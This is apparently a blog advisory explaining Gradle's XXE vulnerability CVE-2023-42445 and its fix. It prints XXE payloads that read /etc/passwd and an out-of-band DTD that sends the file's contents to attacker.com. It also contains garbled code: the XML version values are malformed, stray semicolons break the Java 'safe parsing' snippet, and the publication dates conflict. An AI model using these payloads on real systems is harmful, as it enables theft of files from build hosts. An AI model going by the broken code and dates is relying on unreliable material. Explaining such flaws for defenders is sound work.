CVE-2023-42445 - Breaking Down Gradle’s OOB-XXE XML Vulnerability

Published: June 26, 2023
CVSS: 7.3 (High)
Reference: Original Advisory


Gradle is a popular open-source build automation tool, commonly used for building, testing, and deploying code in a variety of programming languages. In 2023, the community discovered a dangerous vulnerability: CVE-2023-42445, which exposed systems to XML External Entity (XXE) attacks—specifically to Out-Of-Band (OOB) XXE variants that could let attackers steal files from your computer just by parsing a crafted XML file.

In this article, we’ll explain how this issue works, show code snippets, how it could be exploited, and what the Gradle team did to lock things down.

What Was The Problem?

Gradle allows for automation of building, testing, and packaging software. Part of this work means parsing XML files—things like Ivy XML descriptors and Maven POM files that might be downloaded from remote repositories. Until recently, Gradle didn't disable XML external entity resolution when reading these files. This means an attacker could sneak a malicious XML file into your build, and Gradle would unknowingly parse it, possibly letting sensitive files or environment variables be sent to an attacker’s server.

XML External Entity (XXE) Recap

XXE lets an attacker create external links in an XML file to local files, or even remote resources. With OOB-XXE ("Out Of Band"), the exfiltration (theft) of data happens via network (e.g., HTTP). It can go undetected, even if the original error isn’t visible.

1. A Malicious XML Descriptor

Suppose an attacker finds a way to upload their own Maven pom.xml to a repository you use. Their file includes something like:

<?xml version="1." encoding="ISO-8859-1"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<project>
  <description>&xxe;</description>
</project>

Or for an OOB (Out Of Band) attack that exfiltrates data

<?xml version="1." encoding="ISO-8859-1"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "http://attacker.com/file?data=%2Fetc%2Fpasswd"; >
]>
<project>
  <description>&xxe;</description>
</project>

2. Gradle Parses The File

When Gradle downloads and parses this XML file as part of the dependency resolution or build process, it will process the &xxe; entity.

What Happens Next?

- In the local file case: If your Gradle JVM is allowed to read /etc/passwd, the file content is injected into the project description field in memory. Sometimes this leaks to logs or further artifacts.
- In the remote (OOB) case: Gradle tries to fetch a resource from http://attacker.com/file?data=/etc/passwd, causing it to connect to the attacker's server, potentially leaking network or sensitive file info.

3. Realistic Attack Scenario

If you or your CI/CD tool uses remote Maven or Ivy repositories that attackers can write to, OR if you use dependencies that you don't fully control, your system could be vulnerable.

Demo PoC: XXE Exploit Against Gradle

Let’s say you’re using a corrupted Maven POM with an external entity. Here’s what a basic XXE payload might look like:

<?xml version="1."?>
<!DOCTYPE root [
  <!ENTITY % remote SYSTEM "http://attacker.com/evil.dtd">;
  %remote;
]>
<project>
  <description>Some text</description>
</project>

And evil.dtd on attacker.com could be

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % exfiltrate "<!ENTITY xxe SYSTEM 'http://attacker.com/leak?data=%file;'>">;
%exfiltrate;

How it works:

Gradle parses the XML, fetches evil.dtd from attacker’s server.

- That DTD tells Gradle to load /etc/passwd, then send its contents via a request to the attacker.

How Did Gradle Fix It?

- In Gradle 7.6.3 and 8.4:

Here's what safe XML parsing looks like in Java (what Gradle now does)

DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://xml.org/sax/features/external-general-entities";, false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities";, false);
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl";, true);
DocumentBuilder db = dbf.newDocumentBuilder();
// now parse

Upgrade Gradle

If you use remote Maven or Ivy repositories, upgrade to Gradle 7.6.3 or 8.4+ as soon as possible:

`

./gradlew wrapper --gradle-version=8.4

Further Reading

- Gradle Security Advisory
- Official Patch Commit
- OWASP XXE Guide_Processing)
- Maven POM Reference
- Ivy XML Docs

Conclusion

CVE-2023-42445 is a good reminder just how dangerous XML parsing can get—even in a tool mostly meant for building code! If you haven’t already, update your Gradle and audit your dependencies for any suspicious XML handling. Stay safe out there!

Timeline

Published on: 10/06/2023 14:15:12 UTC
Last modified on: 11/10/2023 18:15:08 UTC